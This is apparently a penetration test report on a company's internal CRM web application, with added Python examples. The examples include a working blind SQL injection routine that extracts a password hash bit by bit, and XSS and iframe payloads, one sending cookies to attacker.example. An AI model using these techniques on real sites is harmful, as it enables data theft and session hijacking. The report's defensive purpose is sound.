Table of Contents
Executive Summary ............ 3
Goal ............ 3
Scope ............ 3
Assessment Findings ............ 4
Details ............ 12
Conclusion ............ 22
Recommendation ............ 22
Executive Summary
We thank you for choosing Appin Software Security Pvt. Ltd. as your Information Security partner. We appreciate your business and look forward to providing you services in the future. The following report presents the results of the application assessment carried out at your request. If you have any questions, please contact your Appin representative or email contact@appinlabs.com
Goal
To provide a comprehensive Penetration Testing Report of the Web Application based on the OWASP Top 10, covering, but not limited to, SQL Injection, CRLF Injection, Directory Traversal, File Inclusion, Buffer Overflow, Cross Site Scripting (XSS) and Cross Site Request Forgery, which will help Quatrro to improve its security level by addressing the vulnerabilities found.
Scope
In depth Security Assessment of the following Web Application:
Web Application: http://10.100.4.50/testcrm/
Audit Dates: 26th March
Assessment Findings

Ref No   Vulnerability Name           Risk Level
1        SQL Injection                High
2        Cross Site Scripting         High
3        Unencrypted Login Request    Medium
4        Phishing Through Frames      Medium
5        Directory Listing Enabled    Low
(The names for Refs 2 to 5 are as given in the Details section, which lists the same five findings with these risk levels.)

Affected URLs, Ref 1 (SQL Injection):
http://10.100.4.50/testcrm/orderdetail_frame.php?srno=163473
http://10.100.4.50/testcrm/orderinfo.php?orderno=0111111144

Affected URLs, Ref 2 (Cross Site Scripting); the report repeats the same list for Refs 3 and 4:
http://10.100.4.50/testcrm/currency_master.php?cid=15
http://10.100.4.50/testcrm/Payment_master.php?pid=11
http://10.100.4.50/testcrm/mail_template.php?mtid=16
http://10.100.4.50/testcrm/subcategory.php?action=edit&catid=1
http://10.100.4.50/testcrm/newproduct.php?srno=558
http://10.100.4.50/testcrm/system.php?action=edit&idsystem=1
http://10.100.4.50/testcrm/component.php?action=edit&idcomponent=1
http://10.100.4.50/testcrm/incident.php?action=edit&idincident=1
http://10.100.4.50/testcrm/module.php?action=edit&idmodule=1
http://10.100.4.50/testcrm/promocode.php?action=edit&id=6
http://10.100.4.50/testcrm/origin_of_cust.php?action=edit&srno=1
http://10.100.4.50/testcrm/sale_medium.php?action=edit&id=1
http://10.100.4.50/testcrm/brand_master.php?action=edit&id=1
http://10.100.4.50/testcrm/disposition_master.php?action=edit&id=1
http://10.100.4.50/testcrm/computer_type.php?action=edit&code=1
http://10.100.4.50/testcrm/operatingsys.php?action=edit&code=2
http://10.100.4.50/testcrm/computer_age.php?action=edit&code=1
http://10.100.4.50/testcrm/internet_con.php?action=edit&code=3
http://10.100.4.50/testcrm/createdfrom.php?action=edit&id=2
http://10.100.4.50/testcrm/subvdnmap_edit.php?account=91011832&vdn=60250
http://10.100.4.50/testcrm/subvdnmap_edit.php?account=91011832
http://10.100.4.50/testcrm/reportschdl.php?action=edit&id=1
http://10.100.4.50/testcrm/matrixmaster.php?eid=3&acc=36321671&plan=200000522&act=1
http://10.100.4.50/testcrm/partnerreportsetting.php?action=edit&id=14
http://10.100.4.50/testcrm/survey_edit.php?surveyid=69C82D9A-0E2E-E011-91D3-001E0BD9CB7C
http://10.100.4.50/testcrm/menu_header.php?action=edit&headerid=1
http://10.100.4.50/testcrm/sub_menu.php?action=edit&idsmenu=1
http://10.100.4.50/testcrm/rolemaster.php?action=edit&iduserrights=1
http://10.100.4.50/testcrm/business_agent.php?id=1
http://10.100.4.50/testcrm/accountdetails.php?account=91011832&action=1&aname=AAA
http://10.100.4.50/testcrm/ibmaster.php?ibid=206
http://10.100.4.50/testcrm/subibmaster.ph?ibid=1
http://10.100.4.50/testcrm/department.php?action=edit&depid=3
http://10.100.4.50/testcrm/employeemaster.php?eid=1

Affected URLs, Ref 5 (Directory Listing Enabled): not listed individually in the findings table; the Details section reports it against the application root.
Details
http://10.100.4.50/testcrm/
Vulnerability: SQL Injection
Risk: High
Potential Security Issue: It is possible to view, modify or delete database entries and tables.
Technical Description: A common attempt to reduce exposure to SQL injection is to suppress detailed SQL error messages, which attackers otherwise use to locate injectable scripts quickly. Suppressing the errors removes that feedback but not the injection itself. Blind SQL injection works without any direct data from the database (no error message, no leaked rows): the attacker appends a Boolean expression to the query and observes whether the application's response is identical to, or different from, the original response. Each request yields one bit about the modified query, so the attacker can formulate SQL Boolean expressions whose evaluation is exposed through the application's behaviour, extract data one bit at a time, or modify the query in a malicious way, with nothing more than the page's normal behaviour as feedback.
Fix Recommendations: The primary fix is to stop building SQL statements from request parameters as strings: use parameterised queries (prepared statements) for every query, and validate the type of numeric identifiers such as srno, cid, pid, id and code before use. Input sanitisation is a secondary layer only: a character blacklist can be bypassed in many contexts and strips legitimate data (an apostrophe in a customer name, for instance). With that caveat, verifying that user input does not contain hazardous characters helps prevent malicious users from causing the application to execute unintended operations, such as arbitrary SQL queries, JavaScript executed on the client side, or operating system commands. As a secondary measure it is advised to filter out the following characters:
[1] | (pipe sign)
[2] & (ampersand sign)
[3] ; (semicolon sign)
[4] $ (dollar sign)
[5] % (percent sign)
[6] @ (at sign)
[7] ' (single apostrophe)
[8] " (quotation mark)
[9] \' (backslash-escaped apostrophe)
[10] \" (backslash-escaped quotation mark)
[11] <> (triangular parenthesis)
[12] () (parenthesis)
[13] + (plus sign)
[14] CR (Carriage return, ASCII 0x0d)
[15] LF (Line feed, ASCII 0x0a)
[16] , (comma sign)
[17] \ (backslash)
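The bit-by-bit extraction described above, as an added worked example; it is not code from this report or from the assessed application. It uses an in-memory SQLite database whose tables, order number and sample hash are constructed for the example. The vulnerable function order_exists_vulnerable is a hypothetical stand-in for a page such as orderdetail_frame.php?srno= that concatenates the parameter into its query; the caller sees only whether the page rendered, which is the single bit the text refers to. The hardened order_exists_safe shows the actual fix: a type check followed by a bound parameter.

```python
import sqlite3

# Constructed sample data for this example only; the tables, the order number
# and the hash (md5 of "password") are invented, not data from the assessed
# application.
SAMPLE_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"
KNOWN_SRNO = "163473"  # an srno that exists, so the baseline page renders


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        f"""
        CREATE TABLE orders (srno INTEGER PRIMARY KEY, customer TEXT);
        INSERT INTO orders VALUES ({KNOWN_SRNO}, 'Example Customer');
        CREATE TABLE users (username TEXT, pwhash TEXT);
        INSERT INTO users VALUES ('admin', '{SAMPLE_HASH}');
        """
    )
    return conn


def order_exists_vulnerable(conn, srno):
    """Hypothetical stand-in for a page that splices ?srno= straight into SQL.

    The caller learns only whether a row came back (page rendered or not).
    That single bit per request is all a blind injection needs.
    """
    sql = "SELECT customer FROM orders WHERE srno = " + srno
    return conn.execute(sql).fetchone() is not None


def order_exists_safe(conn, srno):
    """Hardened form: check the type, then bind the value as a parameter.

    The bound value is never parsed as SQL, so no character filtering is
    needed for the query itself to be safe.
    """
    try:
        srno_int = int(srno)
    except ValueError:
        return False
    row = conn.execute(
        "SELECT customer FROM orders WHERE srno = ?", (srno_int,)
    ).fetchone()
    return row is not None


def blind_extract(oracle, column, table, max_len=64):
    """Recover one string through a yes/no oracle, one bit per request.

    oracle(payload) returns True when the page behaves as it does for the
    known-good srno.  Each character is read as seven ASCII bits using
    SQLite's unicode(), substr() and the >> and & operators; a length check
    per position stops the loop at the end of the string.
    """
    value = f"(SELECT {column} FROM {table} LIMIT 1)"
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"{KNOWN_SRNO} AND length({value}) >= {pos}"):
            break
        code = 0
        for bit in range(7):
            cond = f"((unicode(substr({value}, {pos}, 1)) >> {bit}) & 1) = 1"
            if oracle(f"{KNOWN_SRNO} AND {cond}"):
                code |= 1 << bit
        out += chr(code)
    return out


def demo():
    """Return (recovered hash, requests used, safe path's result for an injected value)."""
    conn = make_db()
    requests = {"n": 0}

    def oracle(payload):
        requests["n"] += 1
        return order_exists_vulnerable(conn, payload)

    recovered = blind_extract(oracle, "pwhash", "users")
    blocked = order_exists_safe(conn, f"{KNOWN_SRNO} AND 1=1")
    return recovered, requests["n"], blocked


if __name__ == "__main__":
    print(demo())
```

Run as a script it prints the recovered 32-character hash, the number of requests needed (257: one length check plus seven bit checks for each of the 32 positions, then one final length check that fails), and False for the safe path given the injected value. The character blacklist in the fix recommendation never comes into play on the safe path: the parameter is bound as a literal, so there is nothing left to filter.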
http://10.100.4.50/testcrm/
Vulnerability: Cross Site Scripting
Risk: High
Potential Security Issue: It is possible to steal or manipulate a customer's session and cookies, which might be used to impersonate a legitimate user, allowing the attacker to view or alter user records and to perform transactions as that user.
Technical Description: Cross-Site Scripting allows an attacker to acquire a legitimate user's session or credentials and to impersonate that user when interacting with a specific website. The attack hinges on the fact that the web site contains a script that returns a user's input (usually a parameter value) in an HTML page without first encoding it. Input consisting of JavaScript code is therefore executed by the browser when the script returns this input in the response page. As a result, it is possible to form links to the site where one of the parameters consists of malicious JavaScript code; this code is executed by the user's browser in the site's origin, granting it access to the cookies the user has for the site and to other windows of the site in the user's browser. Possible actions that can be performed by the script are:
[1] Send the user's cookies (for the legitimate site) to the attacker.
[2] Send information that is accessible through the DOM (URLs, form fields, etc.) to the attacker.
The result is that the security and privacy of the victim user are compromised on the vulnerable site.
Fix Recommendations: Encode user-supplied data at the point where it is written into the response, using the encoding appropriate to the context it lands in (HTML body, attribute, JavaScript, URL), rather than relying on stripping characters from input. Input filtering alone is not sufficient: it removes legitimate characters from ordinary data and misses context-specific payloads. Where input filtering is used as an additional layer, we suggest you filter the following characters:
[1] <> (triangular parenthesis)
[2] " (quotation mark)
[3] ' (single apostrophe)
[4] % (percent sign)
[5] ; (semicolon)
[6] () (parenthesis)
[7] & (ampersand sign)
[8] + (plus sign)
http://10.100.4.50/testcrm/
Vulnerability: Unencrypted Login Request
Risk: Medium
Potential Security Issue: It may be possible to steal user login information, such as usernames and passwords, that is sent unencrypted.
Technical Description: During the application test it was detected that an unencrypted login request was sent to the server. Since some of the input fields used in a login process (for example usernames and passwords) are personal and sensitive, they should be sent to the server over an encrypted connection.
Fix Recommendations: Make sure that all login requests are sent to the server over an encrypted connection (HTTPS, i.e. TLS; SSL versions are obsolete). Both the page that carries the login form and the URL the form submits to must be served over HTTPS: a form delivered over plain HTTP can be altered in transit even if its action points at an HTTPS URL. Redirect HTTP requests for the application to HTTPS and consider HTTP Strict Transport Security (HSTS) so that browsers do not fall back to plain HTTP.
http://10.100.4.50/testcrm/
Vulnerability: Phishing Through Frames
Risk: Medium
Potential Security Issue: It is possible to persuade a naive user to supply sensitive information such as a username, password or credit card number.
Technical Description: It is possible for an attacker to inject a frame or iframe tag with malicious content that resembles the attacked site. An incautious user may browse it and not realise that he is leaving the original site and surfing to a malicious site. The attacker may then lure the user to log in again, thus acquiring his login credentials. The fact that the fake site is embedded in the original site helps the attacker by giving the phishing attempt a more credible appearance.
Fix Recommendations: The underlying defect is the same as in the Cross Site Scripting finding: markup supplied in a request parameter is returned in the page without being HTML-encoded. Encode output for its context so that an injected frame tag is rendered as text, and consider a Content Security Policy frame-src directive to restrict where frames on the site may load from. As a secondary input-filtering layer, it is advised to filter out the following characters:
[1] | (pipe sign)
[2] & (ampersand sign)
[3] ; (semicolon sign)
[4] $ (dollar sign)
[5] % (percent sign)
[6] @ (at sign)
[7] ' (single apostrophe)
[8] " (quotation mark)
[9] \' (backslash-escaped apostrophe)
[10] \" (backslash-escaped quotation mark)
[11] <> (triangular parenthesis)
[12] () (parenthesis)
[13] + (plus sign)
[14] CR (Carriage return, ASCII 0x0d)
[15] LF (Line feed, ASCII 0x0a)
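The output-encoding fix for the Cross Site Scripting finding and for the Phishing Through Frames finding above (an injected iframe is the same reflected-markup defect), as an added example; it is not code from this report or from the assessed application. render_vulnerable is a hypothetical stand-in for a page that reflects a parameter unchanged, and the payloads and the legitimate sample value are constructed. The block also shows what the report's character blacklist does to ordinary data, which is why encoding at output rather than stripping at input is the fix.

```python
import html

# Characters the report's fix recommendation proposes to strip from input.
REPORT_BLACKLIST = set('<>"\'%;()&+')

# Constructed payloads and sample data; none of these were observed against
# the assessed application.
SCRIPT_PAYLOAD = (
    "<script>new Image().src='https://attacker.example/?c='"
    "+document.cookie</script>"
)
FRAME_PAYLOAD = (
    '<iframe src="https://attacker.example/relogin" style="border:0"></iframe>'
)
LEGIT_VALUE = "O'Brien & Sons (Ltd) <sales>"


def blacklist_filter(value):
    """The report's approach: drop every listed character from the input."""
    return "".join(c for c in value if c not in REPORT_BLACKLIST)


def render_vulnerable(param):
    """Hypothetical page that reflects a parameter into the HTML body as-is."""
    return f"<p>Results for {param}</p>"


def render_body(param):
    """Hardened form: HTML-encode at the point of output (HTML body context)."""
    return f"<p>Results for {html.escape(param, quote=True)}</p>"


def render_attribute(param):
    """Same data inside a quoted attribute: quote=True keeps it in the quotes."""
    return f'<input type="text" name="q" value="{html.escape(param, quote=True)}">'


def is_inert(rendered):
    """True when no script or frame tag from user data survives in the output."""
    return "<script" not in rendered and "<iframe" not in rendered


def encoding_preserves(value):
    """Output encoding is lossless: the browser decodes exactly what was sent."""
    return html.unescape(html.escape(value, quote=True)) == value
```

For the legitimate value the blacklist yields "OBrien  Sons Ltd sales", silently corrupting a customer name, while the encoded output decodes back to the original text in the browser and both payloads arrive as visible text rather than as tags. The attribute renderer is included because HTML-body encoding without quote=True is not enough once the same data is placed inside a quoted attribute.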
http://10.100.4.50/testcrm/
Vulnerability: Directory Listing Enabled
Risk: Low
Potential Security Issue: It is possible to view and download the contents of certain web application virtual directories, which might contain restricted files.
Technical Description: If the web server is configured improperly, it is possible to retrieve a directory listing by sending a request for a directory rather than for a file.
Fix Recommendations:
[1] Configure the web server to deny listing of directories (on Apache, remove Indexes from the Options of the document root, e.g. Options -Indexes; on IIS, disable Directory Browsing).
[2] If the listing results from a defect in the web server or application software rather than from its configuration, apply the vendor's security patch for that issue.
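A verification check for the two configuration findings in this report, Unencrypted Login Request and Directory Listing Enabled, as an added example that is not part of the original report. It runs offline on constructed HTML responses; the form action login.php and the uploads directory name are assumed for illustration and are not paths reported against the application. In practice the response bodies would come from an HTTP client fetching each page in scope, and the login check is deliberately stricter than the finding's wording: it flags a password form whenever either the page or the submission target is not HTTPS.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed responses for demonstration only (assumed names; not pages
# captured from the assessed application).
LOGIN_PAGE = """
<html><body>
<form action="login.php" method="post">
  <input type="text" name="user">
  <input type="password" name="pass">
  <input type="submit" value="Login">
</form>
<form action="search.php"><input type="text" name="q"></form>
</body></html>
"""

LISTING_PAGE = """
<html><head><title>Index of /testcrm/uploads</title></head>
<body><h1>Index of /testcrm/uploads</h1>
<a href="../">Parent Directory</a>
<a href="export.csv">export.csv</a>
</body></html>
"""


class _FormCollector(HTMLParser):
    """Records each <form> action and whether it contains a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []          # entries are [action, has_password]
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = [a.get("action") or "", False]
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current[1] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def insecure_login_targets(page_url, body):
    """Return submission URLs of password forms that are exposed to plain HTTP.

    A form is flagged when either the page carrying it or the resolved action
    is not https: an http page can be altered in transit even if its action
    points at https, so both legs must be encrypted.
    """
    collector = _FormCollector()
    collector.feed(body)
    page_is_tls = urlsplit(page_url).scheme == "https"
    hits = []
    for action, has_password in collector.forms:
        if not has_password:
            continue
        target = urljoin(page_url, action)
        if not page_is_tls or urlsplit(target).scheme != "https":
            hits.append(target)
    return hits


_INDEX_TITLE = re.compile(r"<title>\s*Index of\s+/", re.IGNORECASE)


def looks_like_directory_listing(body):
    """Heuristic for an auto-generated index page (Apache/nginx style)."""
    return bool(_INDEX_TITLE.search(body)) or "Parent Directory" in body
```

Against the sample login page served from http://10.100.4.50/testcrm/ the check reports http://10.100.4.50/testcrm/login.php; the search form is ignored because it carries no password field. Pointing the form at an https action while the page itself stays on http is still reported, which is the caveat in the fix recommendation above.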
Conclusion
On the basis of the penetration testing carried out on your web application, it can be concluded that the web application contains the vulnerabilities listed above.
Recommendation
High